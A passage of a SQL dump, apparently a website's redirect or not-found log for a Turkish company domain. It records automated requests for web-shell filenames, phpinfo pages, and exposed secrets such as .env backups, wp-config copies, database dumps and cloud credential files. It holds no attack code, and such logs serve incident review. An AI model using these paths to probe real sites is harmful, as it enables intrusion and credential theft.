00:00:00',301),(54714,'http://mail.3s-technologies.com.tr/tr/wso3.php',NULL,'','',1,0,'2025-12-31 00:39:15','0000-00-00 00:00:00',301),(54715,'http://3s-technologies.com.tr/en/.tresh/index.php',NULL,'https://www.bing.com/','',16,0,'2025-12-31 02:09:09','0000-00-00 00:00:00',301),(54716,'http://3s-technologies.com.tr/en/.well-known/error.php',NULL,'https://www.yahoo.com/','',11,0,'2025-12-31 02:09:12','0000-00-00 00:00:00',301),(54717,'http://3s-technologies.com.tr/en/.well-known/gecko-litespeed.php',NULL,'https://www.google.co.uk/','',12,0,'2025-12-31 02:09:13','0000-00-00 00:00:00',301),(54718,'http://3s-technologies.com.tr/en/admin/controller/extension/extension/ultra.php',NULL,'https://duckduckgo.com/','',11,0,'2025-12-31 02:09:17','0000-00-00 00:00:00',301),(54719,'http://3s-technologies.com.tr/en/admin/controller/extension/extension/vx.php',NULL,'https://www.google.de/','',11,0,'2025-12-31 02:09:18','0000-00-00 00:00:00',301),(54720,'http://3s-technologies.com.tr/en/adminfuns.php/.well-known/acme-challenge/file.php',NULL,'https://www.yahoo.com/','',19,0,'2025-12-31 02:09:20','0000-00-00 00:00:00',301),(54721,'http://3s-technologies.com.tr/en/assets/vx.php',NULL,'https://www.google.fr/','',11,0,'2025-12-31 02:09:23','0000-00-00 00:00:00',301),(54722,'http://3s-technologies.com.tr/en/bk/index.php',NULL,'https://www.google.de/','',13,0,'2025-12-31 02:09:25','0000-00-00 00:00:00',301),(54723,'http://3s-technologies.com.tr/en/css/admin.php',NULL,'https://www.google.co.uk/','',14,0,'2025-12-31 02:09:26','0000-00-00 00:00:00',301),(54724,'http://3s-technologies.com.tr/en/update/gely.php',NULL,'https://www.google.fr/','',11,0,'2025-12-31 02:09:34','0000-00-00 00:00:00',301),(54725,'http://3s-technologies.com.tr/tr/991.php',NULL,'','',1,0,'2025-12-31 18:11:19','0000-00-00 00:00:00',301),(54726,'http://3s-technologies.com.tr/tr/995yh.php',NULL,'','',1,0,'2025-12-31 18:11:19','0000-00-00 00:00:00',301),(54727,'http://3s-technologies.com.tr/tr/clasa99.php',NULL,'','',12,0,'2025-12-31 18:11:20','0000-00-00 00:00:00',301),(54728,'http://3s-technologies.com.tr/tr/class995.php',NULL,'','',1,0,'2025-12-31 18:11:21','0000-00-00 00:00:00',301),(54729,'http://3s-technologies.com.tr/tr/agw.php',NULL,'','',1,0,'2025-12-31 18:11:22','0000-00-00 00:00:00',301),(54730,'http://3s-technologies.com.tr/tr/azq.php',NULL,'','',1,0,'2025-12-31 18:11:23','0000-00-00 00:00:00',301),(54731,'http://3s-technologies.com.tr/tr/blurbs19.php',NULL,'','',1,0,'2025-12-31 18:11:24','0000-00-00 00:00:00',301),(54732,'http://3s-technologies.com.tr/tr/ca5.php',NULL,'','',5,0,'2025-12-31 18:11:24','0000-00-00 00:00:00',301),(54733,'http://3s-technologies.com.tr/tr/clavariaceae.php',NULL,'','',1,0,'2025-12-31 18:11:26','0000-00-00 00:00:00',301),(54734,'http://3s-technologies.com.tr/tr/current.php',NULL,'','',1,0,'2025-12-31 18:11:27','0000-00-00 00:00:00',301),(54735,'http://3s-technologies.com.tr/tr/dede.php',NULL,'','',1,0,'2025-12-31 18:11:29','0000-00-00 00:00:00',301),(54736,'http://3s-technologies.com.tr/tr/dvve.php',NULL,'','',4,0,'2025-12-31 18:11:31','0000-00-00 00:00:00',301),(54737,'http://3s-technologies.com.tr/tr/em.php',NULL,'','',2,0,'2025-12-31 18:11:32','0000-00-00 00:00:00',301),(54738,'http://3s-technologies.com.tr/tr/emmh.php',NULL,'','',1,0,'2025-12-31 18:11:32','0000-00-00 00:00:00',301),(54739,'http://3s-technologies.com.tr/tr/file56.php',NULL,'','',2,0,'2025-12-31 18:11:33','0000-00-00 00:00:00',301),(54740,'http://3s-technologies.com.tr/tr/instail.php',NULL,'','',1,0,'2025-12-31 18:11:33','0000-00-00 00:00:00',301),(54741,'http://3s-technologies.com.tr/tr/lda2.php',NULL,'','',1,0,'2025-12-31 18:11:34','0000-00-00 00:00:00',301),(54742,'http://3s-technologies.com.tr/tr/lu4.php',NULL,'','',4,0,'2025-12-31 18:11:35','0000-00-00 00:00:00',301),(54743,'http://3s-technologies.com.tr/tr/lv1.php',NULL,'','',1,0,'2025-12-31 18:11:35','0000-00-00 00:00:00',301),(54744,'http://3s-technologies.com.tr/tr/ly1z.php',NULL,'','',1,0,'2025-12-31 18:11:36','0000-00-00 00:00:00',301),(54745,'http://3s-technologies.com.tr/tr/m1ps.php',NULL,'','',1,0,'2025-12-31 18:11:37','0000-00-00 00:00:00',301),(54746,'http://3s-technologies.com.tr/tr/ml1.php',NULL,'','',1,0,'2025-12-31 18:11:37','0000-00-00 00:00:00',301),(54747,'http://3s-technologies.com.tr/tr/mln.php',NULL,'','',2,0,'2025-12-31 18:11:38','0000-00-00 00:00:00',301),(54748,'http://3s-technologies.com.tr/tr/monarx-analyzer.php',NULL,'','',1,0,'2025-12-31 18:11:39','0000-00-00 00:00:00',301),(54749,'http://3s-technologies.com.tr/tr/rbh.php',NULL,'','',1,0,'2025-12-31 18:11:39','0000-00-00 00:00:00',301),(54750,'http://3s-technologies.com.tr/tr/rg0.php',NULL,'','',1,0,'2025-12-31 18:11:40','0000-00-00 00:00:00',301),(54751,'http://3s-technologies.com.tr/tr/tny.php',NULL,'','',1,0,'2025-12-31 18:11:43','0000-00-00 00:00:00',301),(54752,'http://3s-technologies.com.tr/tr/tool.php',NULL,'','',47,0,'2025-12-31 18:11:45','0000-00-00 00:00:00',301),(54753,'http://3s-technologies.com.tr/tr/vh4.php',NULL,'','',1,0,'2025-12-31 18:11:45','0000-00-00 00:00:00',301),(54754,'http://3s-technologies.com.tr/tr/vhg.php',NULL,'','',1,0,'2025-12-31 18:11:46','0000-00-00 00:00:00',301),(54755,'http://3s-technologies.com.tr/tr/wp-scron.php',NULL,'','',1,0,'2025-12-31 18:11:54','0000-00-00 00:00:00',301),(54756,'http://3s-technologies.com.tr/tr/wp-sx9.php',NULL,'','',1,0,'2025-12-31 18:11:57','0000-00-00 00:00:00',301),(54757,'http://3s-technologies.com.tr/tr/wp22.php',NULL,'','',1,0,'2025-12-31 18:11:58','0000-00-00 00:00:00',301),(54758,'http://3s-technologies.com.tr/tr/xinder.php',NULL,'','',4,0,'2025-12-31 18:12:00','0000-00-00 00:00:00',301),(54759,'http://3s-technologies.com.tr/tr/xp5ase1nkfy09nv5qcakc126.php',NULL,'','',1,0,'2025-12-31 18:12:01','0000-00-00 00:00:00',301),(54760,'http://3s-technologies.com.tr/tr/zh2.php',NULL,'','',1,0,'2025-12-31 18:12:01','0000-00-00 00:00:00',301),(54761,'http://3s-technologies.com.tr/en/wp-content/themes/twentythirteen',NULL,'https://www.yahoo.com/','',23,0,'2025-12-31 19:39:24','0000-00-00 00:00:00',301),(54762,'http://3s-technologies.com.tr/en/wp-content/themes/twentyfourteen',NULL,'https://www.google.fr/','',17,0,'2025-12-31 19:39:25','0000-00-00 00:00:00',301),(54763,'http://3s-technologies.com.tr/en/pinfo.php',NULL,'https://www.google.com/','',1,0,'2026-01-01 06:40:13','0000-00-00 00:00:00',301),(54764,'http://3s-technologies.com.tr/en/temp.php',NULL,'https://www.google.com/','',1,0,'2026-01-01 06:40:15','0000-00-00 00:00:00',301),(54765,'http://3s-technologies.com.tr/en/time.php',NULL,'https://www.google.com/','',1,0,'2026-01-01 06:40:16','0000-00-00 00:00:00',301),(54766,'http://3s-technologies.com.tr/en/infophp.php',NULL,'https://www.google.com/','',1,0,'2026-01-01 06:40:17','0000-00-00 00:00:00',301),(54767,'http://3s-technologies.com.tr/en/php-info.php',NULL,'https://www.google.com/','',1,0,'2026-01-01 06:40:18','0000-00-00 00:00:00',301),(54768,'http://3s-technologies.com.tr/en/phpversion.php',NULL,'https://www.google.com/','',1,0,'2026-01-01 06:40:19','0000-00-00 00:00:00',301),(54769,'http://3s-technologies.com.tr/en/old_phpinfo.php',NULL,'https://www.google.com/','',1,0,'2026-01-01 06:40:20','0000-00-00 00:00:00',301),(54770,'http://3s-technologies.com.tr/en/linusadmin-phpinfo.php',NULL,'https://www.google.com/','',1,0,'2026-01-01 06:40:21','0000-00-00 00:00:00',301),(54771,'http://3s-technologies.com.tr/en/_environment',NULL,'https://www.google.com/','',1,0,'2026-01-01 06:40:23','0000-00-00 00:00:00',301),(54772,'http://3s-technologies.com.tr/en/webroot/index.php/_environment',NULL,'https://www.google.com/','',1,0,'2026-01-01 06:40:24','0000-00-00 00:00:00',301),(54773,'http://3s-technologies.com.tr/en/admin/phpinfo.php',NULL,'https://www.google.com/','',1,0,'2026-01-01 06:40:26','0000-00-00 00:00:00',301),(54774,'http://3s-technologies.com.tr/en/admin/info.php',NULL,'https://www.google.com/','',1,0,'2026-01-01 06:40:26','0000-00-00 00:00:00',301),(54775,'http://3s-technologies.com.tr/en/admin/php.php',NULL,'https://www.google.com/','',1,0,'2026-01-01 06:40:27','0000-00-00 00:00:00',301),(54776,'http://3s-technologies.com.tr/en/test/info.php',NULL,'https://www.google.com/','',1,0,'2026-01-01 06:40:29','0000-00-00 00:00:00',301),(54777,'http://3s-technologies.com.tr/en/test/php.php',NULL,'https://www.google.com/','',1,0,'2026-01-01 06:40:30','0000-00-00 00:00:00',301),(54778,'http://3s-technologies.com.tr/en/dev/phpinfo.php',NULL,'https://www.google.com/','',1,0,'2026-01-01 06:40:31','0000-00-00 00:00:00',301),(54779,'http://3s-technologies.com.tr/en/dev/info.php',NULL,'https://www.google.com/','',1,0,'2026-01-01 06:40:31','0000-00-00 00:00:00',301),(54780,'http://3s-technologies.com.tr/en/dev/php.php',NULL,'https://www.google.com/','',1,0,'2026-01-01 06:40:32','0000-00-00 00:00:00',301),(54781,'http://3s-technologies.com.tr/en/development/phpinfo.php',NULL,'https://www.google.com/','',1,0,'2026-01-01 06:40:33','0000-00-00 00:00:00',301),(54782,'http://3s-technologies.com.tr/en/development/info.php',NULL,'https://www.google.com/','',1,0,'2026-01-01 06:40:34','0000-00-00 00:00:00',301),(54783,'http://3s-technologies.com.tr/en/api/info.php',NULL,'https://www.google.com/','',1,0,'2026-01-01 06:40:36','0000-00-00 00:00:00',301),(54784,'http://3s-technologies.com.tr/en/backend/phpinfo.php',NULL,'https://www.google.com/','',1,0,'2026-01-01 06:40:37','0000-00-00 00:00:00',301),(54785,'http://3s-technologies.com.tr/en/backend/info.php',NULL,'https://www.google.com/','',1,0,'2026-01-01 06:40:38','0000-00-00 00:00:00',301),(54786,'http://3s-technologies.com.tr/en/server/phpinfo.php',NULL,'https://www.google.com/','',1,0,'2026-01-01 06:40:38','0000-00-00 00:00:00',301),(54787,'http://3s-technologies.com.tr/en/server/info.php',NULL,'https://www.google.com/','',1,0,'2026-01-01 06:40:39','0000-00-00 00:00:00',301),(54788,'http://3s-technologies.com.tr/en/laravel/phpinfo.php',NULL,'https://www.google.com/','',1,0,'2026-01-01 06:40:40','0000-00-00 00:00:00',301),(54789,'http://3s-technologies.com.tr/en/laravel/info.php',NULL,'https://www.google.com/','',1,0,'2026-01-01 06:40:41','0000-00-00 00:00:00',301),(54790,'http://3s-technologies.com.tr/en/dashboard/phpinfo.php',NULL,'https://www.google.com/','',1,0,'2026-01-01 06:40:41','0000-00-00 00:00:00',301),(54791,'http://3s-technologies.com.tr/en/dashboard/info.php',NULL,'https://www.google.com/','',1,0,'2026-01-01 06:40:43','0000-00-00 00:00:00',301),(54792,'http://3s-technologies.com.tr/en/config.inc.php',NULL,'https://www.google.com/','',1,0,'2026-01-01 06:40:46','0000-00-00 00:00:00',301),(54793,'http://3s-technologies.com.tr/en/config.json',NULL,'https://www.google.com/','',2,0,'2026-01-01 06:40:47','0000-00-00 00:00:00',301),(54794,'http://3s-technologies.com.tr/en/config.yml',NULL,'https://www.google.com/','',1,0,'2026-01-01 06:40:48','0000-00-00 00:00:00',301),(54795,'http://3s-technologies.com.tr/en/config.yaml',NULL,'https://www.google.com/','',1,0,'2026-01-01 06:40:48','0000-00-00 00:00:00',301),(54796,'http://3s-technologies.com.tr/en/app/config.php',NULL,'https://www.google.com/','',3,0,'2026-01-01 06:40:49','0000-00-00 00:00:00',301),(54797,'http://3s-technologies.com.tr/en/includes/config.php',NULL,'https://www.google.com/','',1,0,'2026-01-01 06:40:50','0000-00-00 00:00:00',301),(54798,'http://3s-technologies.com.tr/en/admin/config.php',NULL,'https://www.google.com/','',1,0,'2026-01-01 06:40:51','0000-00-00 00:00:00',301),(54799,'http://3s-technologies.com.tr/en/api/config.php',NULL,'https://www.google.com/','',1,0,'2026-01-01 06:40:52','0000-00-00 00:00:00',301),(54800,'http://3s-technologies.com.tr/en/core/config.php',NULL,'https://www.google.com/','',1,0,'2026-01-01 06:40:52','0000-00-00 00:00:00',301),(54801,'http://3s-technologies.com.tr/en/database/config.php',NULL,'https://www.google.com/','',1,0,'2026-01-01 06:40:53','0000-00-00 00:00:00',301),(54802,'http://3s-technologies.com.tr/en/db/config.php',NULL,'https://www.google.com/','',1,0,'2026-01-01 06:40:54','0000-00-00 00:00:00',301),(54803,'http://3s-technologies.com.tr/en/conf/config.php',NULL,'https://www.google.com/','',1,0,'2026-01-01 06:40:55','0000-00-00 00:00:00',301),(54804,'http://3s-technologies.com.tr/en/db_config.php',NULL,'https://www.google.com/','',1,0,'2026-01-01 06:40:58','0000-00-00 00:00:00',301),(54805,'http://3s-technologies.com.tr/en/database.yml',NULL,'https://www.google.com/','',1,0,'2026-01-01 06:40:59','0000-00-00 00:00:00',301),(54806,'http://3s-technologies.com.tr/en/db/database.yml',NULL,'https://www.google.com/','',1,0,'2026-01-01 06:41:00','0000-00-00 00:00:00',301),(54807,'http://3s-technologies.com.tr/en/config/database.yml',NULL,'https://www.google.com/','',1,0,'2026-01-01 06:41:01','0000-00-00 00:00:00',301),(54808,'http://3s-technologies.com.tr/en/config/database.php',NULL,'https://www.google.com/','',1,0,'2026-01-01 06:41:02','0000-00-00 00:00:00',301),(54809,'http://3s-technologies.com.tr/en/.env.backup',NULL,'https://www.google.com/','',3,0,'2026-01-01 06:41:06','0000-00-00 00:00:00',301),(54810,'http://3s-technologies.com.tr/en/.env.save',NULL,'https://www.google.com/','',1,0,'2026-01-01 06:41:07','0000-00-00 00:00:00',301),(54811,'http://3s-technologies.com.tr/en/.env.prod',NULL,'https://www.google.com/','',1,0,'2026-01-01 06:41:08','0000-00-00 00:00:00',301),(54812,'http://3s-technologies.com.tr/en/storage/logs/laravel.log',NULL,'https://www.google.com/','',2,0,'2026-01-01 06:41:36','0000-00-00 00:00:00',301),(54813,'http://3s-technologies.com.tr/en/bootstrap/cache/config.php',NULL,'https://www.google.com/','',1,0,'2026-01-01 06:41:37','0000-00-00 00:00:00',301),(54814,'http://3s-technologies.com.tr/en/wp-config.php.save',NULL,'https://www.google.com/','',1,0,'2026-01-01 06:41:41','0000-00-00 00:00:00',301),(54815,'http://3s-technologies.com.tr/en/wp-config.php~',NULL,'https://www.google.com/','',1,0,'2026-01-01 06:41:42','0000-00-00 00:00:00',301),(54816,'http://3s-technologies.com.tr/en/wp-config.txt',NULL,'https://www.google.com/','',1,0,'2026-01-01 06:41:42','0000-00-00 00:00:00',301),(54817,'http://3s-technologies.com.tr/en/backup.sql',NULL,'https://www.google.com/','',1,0,'2026-01-01 06:41:43','0000-00-00 00:00:00',301),(54818,'http://3s-technologies.com.tr/en/database.sql',NULL,'https://www.google.com/','',1,0,'2026-01-01 06:41:44','0000-00-00 00:00:00',301),(54819,'http://3s-technologies.com.tr/en/db.sql',NULL,'https://www.google.com/','',1,0,'2026-01-01 06:41:45','0000-00-00 00:00:00',301),(54820,'http://3s-technologies.com.tr/en/dump.sql',NULL,'https://www.google.com/','',1,0,'2026-01-01 06:41:46','0000-00-00 00:00:00',301),(54821,'http://3s-technologies.com.tr/en/backup.zip',NULL,'https://www.google.com/','',1,0,'2026-01-01 06:41:47','0000-00-00 00:00:00',301),(54822,'http://3s-technologies.com.tr/en/backup.tar.gz',NULL,'https://www.google.com/','',1,0,'2026-01-01 06:41:48','0000-00-00 00:00:00',301),(54823,'http://3s-technologies.com.tr/en/site.zip',NULL,'https://www.google.com/','',1,0,'2026-01-01 06:41:48','0000-00-00 00:00:00',301),(54824,'http://3s-technologies.com.tr/en/www.zip',NULL,'https://www.google.com/','',1,0,'2026-01-01 06:41:49','0000-00-00 00:00:00',301),(54825,'http://3s-technologies.com.tr/en/config.bak',NULL,'https://www.google.com/','',1,0,'2026-01-01 06:41:50','0000-00-00 00:00:00',301),(54826,'http://3s-technologies.com.tr/en/config.old',NULL,'https://www.google.com/','',1,0,'2026-01-01 06:41:51','0000-00-00 00:00:00',301),(54827,'http://3s-technologies.com.tr/en/config.save',NULL,'https://www.google.com/','',1,0,'2026-01-01 06:41:52','0000-00-00 00:00:00',301),(54828,'http://3s-technologies.com.tr/en/config~',NULL,'https://www.google.com/','',1,0,'2026-01-01 06:41:53','0000-00-00 00:00:00',301),(54829,'http://3s-technologies.com.tr/en/debug.log',NULL,'https://www.google.com/','',1,0,'2026-01-01 06:41:54','0000-00-00 00:00:00',301),(54830,'http://3s-technologies.com.tr/en/error.log',NULL,'https://www.google.com/','',1,0,'2026-01-01 06:41:55','0000-00-00 00:00:00',301),(54831,'http://3s-technologies.com.tr/en/errors.log',NULL,'https://www.google.com/','',1,0,'2026-01-01 06:41:56','0000-00-00 00:00:00',301),(54832,'http://3s-technologies.com.tr/en/debug.txt',NULL,'https://www.google.com/','',1,0,'2026-01-01 06:41:57','0000-00-00 00:00:00',301),(54833,'http://3s-technologies.com.tr/en/php_errors.log',NULL,'https://www.google.com/','',1,0,'2026-01-01 06:41:59','0000-00-00 00:00:00',301),(54834,'http://3s-technologies.com.tr/en/php_error.log',NULL,'https://www.google.com/','',1,0,'2026-01-01 06:42:00','0000-00-00 00:00:00',301),(54835,'http://3s-technologies.com.tr/en/.aws/config',NULL,'https://www.google.com/','',1,0,'2026-01-01 06:42:02','0000-00-00 00:00:00',301),(54836,'http://3s-technologies.com.tr/en/aws.json',NULL,'https://www.google.com/','',1,0,'2026-01-01 06:42:03','0000-00-00 00:00:00',301),(54837,'http://3s-technologies.com.tr/en/aws-config.json',NULL,'https://www.google.com/','',1,0,'2026-01-01 06:42:03','0000-00-00 00:00:00',301),(54838,'http://3s-technologies.com.tr/en/.s3cfg',NULL,'https://www.google.com/','',1,0,'2026-01-01 06:42:04','0000-00-00 00:00:00',301),(54839,'http://3s-technologies.com.tr/en/s3.yml',NULL,'https://www.google.com/','',1,0,'2026-01-01 06:42:06','0000-00-00 00:00:00',301),(54840,'http://3s-technologies.com.tr/en/.gcloud/credentials',NULL,'https://www.google.com/','',1,0,'2026-01-01 06:42:06','0000-00-00 00:00:00',301),(54841,'http://3s-technologies.com.tr/en/gcp-credentials.json',NULL,'https://www.google.com/','',1,0,'2026-01-01 06:42:08','0000-00-00 00:00:00',301),(54842,'http://3s-technologies.com.tr/en/azure.json',NULL,'https://www.google.com/','',1,0,'2026-01-01 06:42:08','0000-00-00 00:00:00',301),(54843,'http://3s-technologies.com.tr/en/.azure/credentials',NULL,'https://www.google.com/','',1,0,'2026-01-01 06:42:10','0000-00-00 00:00:00',301),(54844,'http://3s-technologies.com.tr/en/credentials.json',NULL,'https://www.google.com/','',2,0,'2026-01-01 06:42:10','0000-00-00 00:00:00',301),(54845,'http://3s-technologies.com.tr/en/secrets.json',NULL,'https://www.google.com/','',2,0,'2026-01-01 06:42:11','0000-00-00 00:00:00',301),(54846,'http://3s-technologies.com.tr/en/keys.json',NULL,'https://www.google.com/','',1,0,'2026-01-01 06:42:12','0000-00-00 00:00:00',301),(54847,'http://3s-technologies.com.tr/en/tokens.json',NULL,'https://www.google.com/','',1,0,'2026-01-01 06:42:13','0000-00-00 00:00:00',301),(54848,'http://3s-technologies.com.tr/en/api_keys.json',NULL,'https://www.google.com/','',1,0,'2026-01-01 06:42:14','0000-00-00 00:00:00',301),(54849,'http://3s-technologies.com.tr/en/apikeys.json',NULL,'https://www.google.com/','',1,0,'2026-01-01 06:42:15','0000-00-00 00:00:00',301),(54850,'http://3s-technologies.com.tr/en/api-keys.json',NULL,'https://www.google.com/','',1,0,'2026-01-01 06:42:16','0000-00-00 00:00:00',301),(54851,'http://3s-technologies.com.tr/en/docker-compose.yml',NULL,'https://www.google.com/','',2,0,'2026-01-01 06:42:16','0000-00-00 00:00:00',301),(54852,'http://3s-technologies.com.tr/en/docker-compose.yaml',NULL,'https://www.google.com/','',1,0,'2026-01-01 06:42:17','0000-00-00 00:00:00',301),(54853,'http://3s-technologies.com.tr/en/.dockerenv',NULL,'https://www.google.com/','',1,0,'2026-01-01 06:42:18','0000-00-00 00:00:00',301),(54854,'http://3s-technologies.com.tr/en/dockerfile',NULL,'https://www.google.com/','',2,0,'2026-01-01 06:42:19','0000-00-00 00:00:00',301),(54855,'http://3s-technologies.com.tr/en/.docker/config.json',NULL,'https://www.google.com/','',1,0,'2026-01-01 06:42:20','0000-00-00 00:00:00',301),(54856,'http://3s-technologies.com.tr/en/kubernetes.yml',NULL,'https://www.google.com/','',1,0,'2026-01-01 06:42:20','0000-00-00 00:00:00',301),(54857,'http://3s-technologies.com.tr/en/k8s.yaml',NULL,'https://www.google.com/','',1,0,'2026-01-01 06:42:22','0000-00-00 00:00:00',301),(54858,'http://3s-technologies.com.tr/en/.gitconfig',NULL,'https://www.google.com/','',1,0,'2026-01-01 06:42:24','0000-00-00 00:00:00',301),(54859,'http://3s-technologies.com.tr/en/settings.json',NULL,'https://www.google.com/','',1,0,'2026-01-01 06:42:25','0000-00-00 00:00:00',301),(54860,'http://3s-technologies.com.tr/en/app.json',NULL,'https://www.google.com/','',1,0,'2026-01-01 06:42:26','0000-00-00 00:00:00',301),(54861,'http://3s-technologies.com.tr/en/app.yml',NULL,'https://www.google.com/','',1,0,'2026-01-01 06:42:27','0000-00-00 00:00:00',301),(54862,'http://3s-technologies.com.tr/en/parameters.yml',NULL,'https://www.google.com/','',1,0,'2026-01-01 06:42:28','0000-00-00 00:00:00',301),(54863,'http://3s-technologies.com.tr/en/parameters.json',NULL,'https://www.google.com/','',1,0,'2026-01-01 06:42:29','0000-00-00 00:00:00',301),(54864,'http://3s-technologies.com.tr/en/web.config',NULL,'https://www.google.com/','',1,0,'2026-01-01 06:42:30','0000-00-00 00:00:00',301),(54865,'http://3s-technologies.com.tr/en/head.php',NULL,'https://www.google.fr/','',3,0,'2026-01-01 13:31:54','0000-00-00 00:00:00',301),(54866,'http://3s-technologies.com.tr/en/images/crystal/about.php',NULL,'https://www.google.de/','',1,0,'2026-01-01 13:31:55','0000-00-00 00:00:00',301),(54867,'http://3s-technologies.com.tr/en/wp-content/uploads/phpinfo.php',NULL,'https://www.google.co.uk/','',1,0,'2026-01-01 13:32:06','0000-00-00 00:00:00',301),(54868,'http://3s-technologies.com.tr/tr/acwfihfh.php',NULL,'','',6,0,'2026-01-01 17:19:39','0000-00-00 00:00:00',301),(54869,'http://3s-technologies.com.tr/tr/f2f.php',NULL,'','',7,0,'2026-01-01 17:19:49','0000-00-00 00:00:00',301),(54870,'http://3s-technologies.com.tr/tr/ths.php',NULL,'','',7,0,'2026-01-01 17:19:50','0000-00-00 00:00:00',301),(54871,'http://3s-technologies.com.tr/tr/990.php',NULL,'','',10,0,'2026-01-01 17:19:51','0000-00-00 00:00:00',301),(54872,'http://3s-technologies.com.tr/tr/d996699999.php',NULL,'','',6,0,'2026-01-01 17:19:52','0000-00-00 00:00:00',301),(54873,'http://3s-technologies.com.tr/tr/ierne.php',NULL,'','',6,0,'2026-01-01 17:19:52','0000-00-00 00:00:00',301),(54874,'http://3s-technologies.com.tr/tr/xde.php',NULL,'','',6,0,'2026-01-01 17:19:53','0000-00-00 00:00:00',301),(54875,'http://3s-technologies.com.tr/tr/bjfl.php',NULL,'','',38,0,'2026-01-01 17:19:54','0000-00-00 00:00:00',301),(54876,'http://3s-technologies.com.tr/en/wp-content/cache/index.php',NULL,'https://www.google.de/','',3,0,'2026-01-01 19:12:25','0000-00-00 00:00:00',301),(54877,'http://3s-technologies.com.tr/en/wp-content/plugins/view-source/ioxi-o2.php',NULL,'https://www.google.de/','',3,0,'2026-01-01 19:12:36','0000-00-00 00:00:00',301),(54878,'http://3s-technologies.com.tr/en/alfa',NULL,'https://www.google.de/','',4,0,'2026-01-01 22:09:11','0000-00-00 00:00:00',301),(54879,'http://3s-technologies.com.tr/en/aw.php',NULL,'https://www.google.com/','',5,0,'2026-01-02 04:24:07','0000-00-00 00:00:00',301),(54880,'http://3s-technologies.com.tr/en/public/file.php',NULL,'https://www.google.co.uk/','',1,0,'2026-01-02 10:37:32','0000-00-00 00:00:00',301),(54881,'http://3s-technologies.com.tr/en/wp-admin/css/colors/light/schallfuns.php',NULL,'https://www.yahoo.com/','',1,0,'2026-01-02 10:37:42','0000-00-00 00:00:00',301),(54882,'http://3s-technologies.com.tr/en/wp-admin/includes/schallfuns.php',NULL,'https://www.google.com/','',1,0,'2026-01-02 10:37:46','0000-00-00 00:00:00',301),(54883,'http://3s-technologies.com.tr/en/function/admin.php',NULL,'https://www.bing.com/','',2,0,'2026-01-02 13:51:46','0000-00-00 00:00:00',301),(54884,'http://3s-technologies.com.tr/en/networks.php',NULL,'https://www.google.com/','',2,0,'2026-01-02 13:51:59','0000-00-00 00:00:00',301),(54885,'https://mail.3s-technologies.com.tr/en/wp-login.php',NULL,'https://www.google.com/search?q=wordpress','',1,0,'2026-01-03 01:44:06','0000-00-00 00:00:00',301),(54886,'http://mail.3s-technologies.com.tr/en/wp-login.php',NULL,'https://duckduckgo.com/','',5,0,'2026-01-03 01:44:07','0000-00-00 00:00:00',301),(54887,'https://mail.3s-technologies.com.tr/en/wp-admin',NULL,'','',1,0,'2026-01-03 01:44:08','0000-00-00 00:00:00',301),(54888,'http://3s-technologies.com.tr/tr/.vscode/ftp-config.json',NULL,'','',1,0,'2026-01-03 05:59:26','0000-00-00 00:00:00',301),(54889,'http://3s-technologies.com.tr/tr/.ftp-config.json',NULL,'','',1,0,'2026-01-03 05:59:32','0000-00-00 00:00:00',301),(54890,'https://www.3s-technologies.com.tr/en/wp-admin',NULL,'https://duckduckgo.com/','',6,0,'2026-01-03 10:33:46','0000-00-00 00:00:00',301),(54891,'http://3s-technologies.com.tr/tr/bnn_.php',NULL,'','',32,0,'2026-01-03 11:46:49','0000-00-00 00:00:00',301),(54892,'http://3s-technologies.com.tr/tr/file58.php',NULL,'','',5,0,'2026-01-03 11:46:50','0000-00-00 00:00:00',301),(54893,'http://3s-technologies.com.tr/tr/0w1d.php',NULL,'','',1,0,'2026-01-03 11:46:51','0000-00-00 00:00:00',301),(54894,'http://3s-technologies.com.tr/tr/strift.php',NULL,'','',1,0,'2026-01-03 11:46:53','0000-00-00 00:00:00',301),(54895,'http://3s-technologies.com.tr/tr/bel.php',NULL,'','',3,0,'2026-01-03 11:46:54','0000-00-00 00:00:00',301),(54896,'http://3s-technologies.com.tr/tr/rk1.php',NULL,'','',2,0,'2026-01-03 11:46:55','0000-00-00 00:00:00',301),(54897,'http://3s-technologies.com.tr/tr/xw.php',NULL,'','',1,0,'2026-01-03 11:47:04','0000-00-00 00:00:00',301),(54898,'http://3s-technologies.com.tr/tr/xe.php',NULL,'','',2,0,'2026-01-03 11:47:16','0000-00-00 00:00:00',301),(54899,'http://3s-technologies.com.tr/tr/uwu.php',NULL,'','',12,0,'2026-01-03 17:24:22','0000-00-00 00:00:00',301),(54900,'http://3s-technologies.com.tr/tr/doelr.php',NULL,'','',1,0,'2026-01-03 17:46:32','0000-00-00 00:00:00',301),(54901,'http://3s-technologies.com.tr/tr/zc-104.php',NULL,'','',18,0,'2026-01-03 17:46:38','0000-00-00 00:00:00',301),(54902,'http://3s-technologies.com.tr/tr/tqloh.php',NULL,'','',2,0,'2026-01-03 17:46:43','0000-00-00 00:00:00',301),(54903,'http://3s-technologies.com.tr/tr/ging.php',NULL,'','',1,0,'2026-01-03 17:46:45','0000-00-00 00:00:00',301),(54904,'http://3s-technologies.com.tr/tr/s12.php',NULL,'','',2,0,'2026-01-03 17:46:48','0000-00-00 00:00:00',301),(54905,'http://3s-technologies.com.tr/tr/ssxsl.php',NULL,'','',3,0,'2026-01-03 17:47:00','0000-00-00 00:00:00',301),(54906,'http://3s-technologies.com.tr/tr/sikma.php',NULL,'','',3,0,'2026-01-03 17:47:02','0000-00-00 00:00:00',301),(54907,'http://3s-technologies.com.tr/tr/xenium4x.php',NULL,'','',1,0,'2026-01-03 17:47:09','0000-00-00 00:00:00',301),(54908,'http://3s-technologies.com.tr/tr/hbyra.php',NULL,'','',2,0,'2026-01-03 17:47:23','0000-00-00 00:00:00',301),(54909,'http://3s-technologies.com.tr/tr/pu8.php',NULL,'','',3,0,'2026-01-03 17:47:30','0000-00-00 00:00:00',301),(54910,'http://3s-technologies.com.tr/tr/rh1.php',NULL,'','',4,0,'2026-01-03 17:47:35','0000-00-00 00:00:00',301),(54911,'http://3s-technologies.com.tr/tr/dout.php',NULL,'','',1,0,'2026-01-03 17:48:11','0000-00-00 00:00:00',301),(54912,'http://3s-technologies.com.tr/tr/wp-loccs.php',NULL,'','',1,0,'2026-01-03 17:48:29','0000-00-00 00:00:00',301),(54913,'http://3s-technologies.com.tr/tr/ii5file.php',NULL,'','',3,0,'2026-01-03 17:48:31','0000-00-00 00:00:00',301),(54914,'http://3s-technologies.com.tr/tr/dparm.php',NULL,'','',1,0,'2026-01-03 17:48:58','0000-00-00 00:00:00',301),(54915,'http://3s-technologies.com.tr/tr/veuntzdf.php',NULL,'','',1,0,'2026-01-03 17:49:00','0000-00-00 